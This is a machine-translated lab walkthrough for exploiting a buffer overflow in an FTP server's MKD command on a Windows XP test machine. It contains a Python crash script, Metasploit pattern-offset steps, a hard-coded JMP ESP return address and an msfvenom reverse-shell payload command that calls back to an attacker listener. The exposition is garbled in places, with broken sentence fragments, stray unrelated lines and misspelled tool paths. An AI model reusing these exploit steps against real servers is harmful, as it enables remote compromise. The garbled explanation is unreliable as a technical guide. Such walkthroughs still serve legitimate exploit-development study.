First use ODB to run the FTP SERVER 1.0 program with buffer overflow vulnerability, then press F9 to let ODB run our program with the vulnerability.
We first use the pattern_create.rb script that comes with kali to generate a string of code for testing buffer overflow, so that we can test the buffer size in the next step.
The script we are going to use here is located at
/usr/share/metasplot-framework/exploit/tools
Down. The script pattern_create.rb file exists in this directory, we use the command
./pattern_create.rb -l 1000
You can generate a 1000-byte string. We will use this string to test the buffer size.
Then write the following python script
#!/usr/bin/env python
from socket import *
payload="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6A b7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad 7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8 Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8A h9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak 2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am 3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1 Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq 1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As 2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3A u4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3 Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay 3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4 Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5 Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be 6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8 Bg9Bh0Bh1Bh2B"
sock = socket(AF_INET,SOCK_STREAM)
sock.connect(('172.16.104.250',21))
sock.recv(1024)
sock.send("USER anonymous\r\n")
sock.recv(1024)
sock.send("PASS anonymous\r\n")
sock.recv(1024)
sock.send("MKD " + payload +"\r\n")
sock.recv(1024)
sock.send("QUIT\r\n")
sock.close
When we run the script, we can see that the memory of odb is empty. In the original ODB, we need to use shift+F7 to view the exception. Through the error message, we can easily find that the address of 69413269 is empty, that is to say , the value of EIP has become 69413269. When the program returns, esp will point to eip, and at this time, the memory space pointed to by eip is empty, and the program will not execute any code.
Now in order to determine the length of the buffer, we need to use the pattern_offset.rb script in kali to do the calculation.
The location of this file is under /usr/share/metasploit-framework/exploit/tools.
We use the command: "./pattern_offset.rb -q 69413269" to get the buffer size of the current program.
Notably. If you do not use ODB to open the program with overflow vulnerability, you can also observe the detailed information in the program's error message. It will also contain the wrong EIP address to which the program is currently pointing. It is not recommended to use the method of payload = 'a'*1000 to determine overflow vulnerabilities. Because of this method, it is difficult for you to determine the address of the program currently pointing to the EIP and get the correct buffer size. This is a QWQ that is not good for the next test.
Obviously, the buffer size we get to the program is 247 bytes. At this time, we know that we need to make the EIP point to an address we want, and the essence of the buffer overflow attack is to make the value in the memory address controllable. As long as we can find a suitable EIP address, let the ESP jump when the program returns. Go to the address pointed to by EIP, and then let the value behind EIP be overwritten by our SHELLCODE to make the unknown function in ESP become our SHELLCODE when the program returns. randomization), the approach we take is memory injection. . Although it feels very awesome, in fact, it does not ==, you only need to make the address of the program return to successfully point to our shellcode space, so there is no need to accurately fall on the QAQ at the beginning of the shellcode, which may be understood here. a bit difficult. . Under Microsoft's ASLR, all memory addresses are random == Here we need to find an available JMP ESP instruction in the user's memory space, and here we do not involve user32.dll and kernel that must be loaded by each program. dll, we simply use odb to determine the first return address of the function. . You don't know why you have long dreams at night. . Of course, the machine code of JMP ESP is called E4FF. Due to the reason of first in, last out, when using a loop to find instructions in the handle returned by loadlibrary, you need to use handle[pos]==0xFF && handle[pos+1]==0xE4.
The address I found here is \x77\xc2\x10\x25, in the program we need to type \x25\x10\xc2\x77.
Then add a padding character to ensure that the shellcode is in our code segment space, and finally add the shellcode generated by msfvemon. The specific command is msfvenom -p windows/shell_reverse_tcp LHOST=local IP LPORT = listening port -b '\x00\x0a\x0d' -f py -c 1.py
-b means to remove bad characters. \x00 is the end of the string, \x0a is \n, and \x0d is a carriage return.
Finally, we can add a string of shellcode to our python script.
Full code:
Execution effect:
172.16.104.250 is xp with vulnerabilities, my kali is 172.16.104.3, and the listening port is 8086
